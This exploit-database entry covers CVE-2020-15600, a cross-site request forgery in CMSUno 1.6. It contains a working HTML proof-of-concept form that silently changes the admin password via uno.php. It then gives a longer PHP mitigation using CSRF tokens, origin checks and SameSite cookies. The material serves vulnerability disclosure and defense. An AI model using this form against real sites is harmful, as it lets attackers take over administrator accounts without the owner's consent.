## https://sploitus.com/exploit?id=1337DAY-ID-34698
# Exploit Title: CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)
# Exploit Author: Noth
# Vendor Homepage: https://github.com/boiteasite/cmsuno
# Software Link: https://github.com/boiteasite/cmsuno
# Version: v1.6
# CVE : 2020-15600
An issue was discovered in CMSUno before 1.6.1. uno.php allows CSRF to change the admin password.
PoC:
<html>
<body>
<script>history.pushState(",",'/')</script>
<form action="http://127.0.0.1/cmsuno-master/uno.php" method="POST">
<input type="hidden" name="user" value="admin"/>
<input type="hidden" name="pass" value="yourpassword"/>
<input type="submit" value="Submit request"/>
</form>
</body>
</html>
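The root cause is that the password-change POST is accepted with no proof that it originated from the site's own form. The handler below is an added illustration written for this note, not CMSUno's code: it binds the form to a per-session synchronizer token, compares it in constant time, and checks the Origin/Referer host, so a form like the PoC above (which cannot read or supply the token) is rejected. The endpoint name and the user/pass field names are assumed to mirror the uno.php form the PoC targets.

```php
<?php
// Added example, not CMSUno's own code. Assumed: handler lives at uno.php
// and takes the same "user"/"pass" fields as the form in the PoC.
session_start();

function csrf_token(): string {
    // One unguessable token per session; the cross-site page cannot read it.
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf'];
}

function same_origin(string $expected_host): bool {
    // Browsers send Origin (or at least Referer) on form POSTs; absence is rejected.
    $hdr = $_SERVER['HTTP_ORIGIN'] ?? $_SERVER['HTTP_REFERER'] ?? '';
    if ($hdr === '' || $expected_host === '') {
        return false;
    }
    $host = (string) parse_url($hdr, PHP_URL_HOST);
    return $host !== '' && strcasecmp($host, $expected_host) === 0;
}

function csrf_valid(): bool {
    $sent = (string) ($_POST['csrf'] ?? '');
    // hash_equals avoids leaking the token through timing differences.
    return isset($_SESSION['csrf']) && hash_equals($_SESSION['csrf'], $sent);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $host = (string) parse_url('http://' . ($_SERVER['HTTP_HOST'] ?? ''), PHP_URL_HOST);
    if (!same_origin($host) || !csrf_valid()) {
        http_response_code(403);
        exit('Rejected: request did not originate from this site.');
    }
    // Here: confirm the session belongs to an authenticated admin, then store
    // password_hash($_POST['pass'], PASSWORD_DEFAULT). Omitted for brevity.
    exit('Password updated.');
}
?>
<!-- The legitimate form carries the token; the PoC's cross-site form cannot. -->
<form method="POST" action="uno.php">
  <input type="hidden" name="csrf" value="<?= htmlspecialchars(csrf_token()) ?>"/>
  <input type="hidden" name="user" value="admin"/>
  <input type="password" name="pass"/>
  <input type="submit" value="Change password"/>
</form>
```

Setting the session cookie with `SameSite=Lax` or `Strict` (via `session_set_cookie_params`) adds a second, independent layer, since the browser then omits the cookie on the cross-site POST entirely.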
# 0day.today [2020-07-19] #